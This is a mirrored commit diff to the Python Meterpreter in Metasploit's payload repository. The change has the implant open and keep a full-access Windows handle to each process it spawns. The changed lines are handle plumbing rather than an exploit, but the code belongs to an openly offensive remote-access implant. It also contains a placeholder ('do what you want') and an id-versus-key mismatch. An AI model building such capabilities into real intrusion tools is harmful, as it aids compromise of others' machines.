1
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-14 17:37:27 +01:00

store and return HANDLE of created process for future uses

This commit is contained in:
Alex Romero 2023-02-17 09:25:53 -05:00
parent 19840fa13d
commit e601e34a1b
No known key found for this signature in database
2 changed files with 20 additions and 5 deletions

View File

@ -743,6 +743,7 @@ PROCESS_TERMINATE = 0x0001
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1fffff
VER_NT_WORKSTATION = 0x0001
VER_NT_DOMAIN_CONTROLLER = 0x0002
VER_NT_SERVER = 0x0003
@ -1383,11 +1384,17 @@ def stdapi_sys_process_execute(request, response):
proc_h.start()
else:
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h_id = meterpreter.add_process(proc_h)
win32_handle = None
if has_windll:
k32 = ctypes.windll.kernel32
win32_handle = k32.OpenProcess(PROCESS_ALL_ACCESS, False, proc_h.pid)
proc_h_id = meterpreter.add_process(proc_h, win32_handle)
response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
channel_id = meterpreter.add_channel(MeterpreterProcess(proc_h))
channel_id = meterpreter.add_channel(MeterpreterProcess(proc_h, win32_handle))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response

View File

@ -667,11 +667,14 @@ export(MeterpreterFile)
#@export
class MeterpreterProcess(MeterpreterChannel):
def __init__(self, proc_h):
def __init__(self, proc_h, win32_handle = None):
self.proc_h = proc_h
self.win32_handle = win32_handle
super(MeterpreterProcess, self).__init__()
def close(self):
if has_windll and self.win32_handle:
ctypes.windll.kernel32.CloseHandle(self.win32_handle)
if self.proc_h.poll() is None:
self.proc_h.kill()
if self.proc_h.ptyfd is not None:
@ -1258,11 +1261,13 @@ class PythonMeterpreter(object):
self.next_channel_id += 1
return idx
def add_process(self, process):
def add_process(self, process, win32_handle = None):
idx = self.next_process_id
self.processes[idx] = process
self.processes[idx] = (process, win32_handle)
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
if win32_handle:
idx = win32_handle
return idx
def close_channel(self, channel_id):
@ -1356,6 +1361,9 @@ class PythonMeterpreter(object):
data += proc_h.stderr_reader.read()
if proc_h.stdout_reader.is_read_ready():
data += proc_h.stdout_reader.read()
proc_win32_h = channel.win32_handle
if has_windll and proc_win32_h:
pass # do what you want
# Defer closing the channel until the data has been sent
if not channel.is_alive():
close_channel = True